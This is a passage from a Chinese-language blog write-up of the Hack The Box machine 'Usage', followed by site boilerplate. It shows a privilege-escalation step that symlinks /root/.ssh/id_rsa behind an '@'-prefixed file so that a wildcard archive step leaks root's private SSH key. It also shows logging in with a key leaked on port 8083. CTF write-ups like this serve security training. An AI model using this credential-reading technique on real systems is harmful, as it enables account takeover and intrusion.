<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> /var/www/html<br><span class="hljs-built_in">touch</span> @id_rsa<br><span class="hljs-built_in">ln</span> -s /root/.ssh/id_rsa id_rsa<br>choose 1       <span class="hljs-comment">#读取root用户登录凭证  ssh -i ./id_rsa root@10.10.11.18</span><br></code></pre></td></tr></table></figure>



<p>我第一次打开靶机的时候发现了开放了8083端口 下载就是dash用户的登录凭证(估计是靶机出了点问题)</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/178.png" srcset="/img/loading.gif" lazyload></p>
<p>我们访问 <code>http://10.10.11.18:8083</code> 发现泄露了私钥，我们下载私钥尝试登录 提示我们</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/177.png" srcset="/img/loading.gif" lazyload></p>
<p>你收到的错误信息 <code>Permissions 0644 for &#39;./id_rsa&#39; are too open. It is required that your private key files are NOT accessible by others.</code> 意味着你的私钥文件 <code>id_rsa</code> 的权限过于宽松，可能允许其他用户读取这个文件。这是一个安全隐患，因此 SSH 客户端拒绝使用这个私钥文件进行认证。</p>
<p>使用 <code>chmod</code> 命令更改 <code>id_rsa</code> 文件的权限</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">sudo</span> chmod <span class="hljs-number">600</span> id_rsa<br></code></pre></td></tr></table></figure>

<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">ssh</span> -i .\id_rsa  dash@<span class="hljs-number">10.10.11.18</span>  <span class="hljs-comment">#成功连接</span><br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/THB/" class="print-no-link">#THB</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Usage(HTB)</div>
      <div>http://backk0m.github.io/2024/06/09/Usage-HTB/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Backk0m</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年6月9日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/04/13/Skyeye%20has%20an%20arbitrary%20file%20download%20vulnerability/" title="Skyeye has an arbitrary file download vulnerability">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Skyeye has an arbitrary file download vulnerability</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/06/05/BoardLight-HTB/" title="BoardLight(HTB)">
                        <span class="hidden-mobile">BoardLight(HTB)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
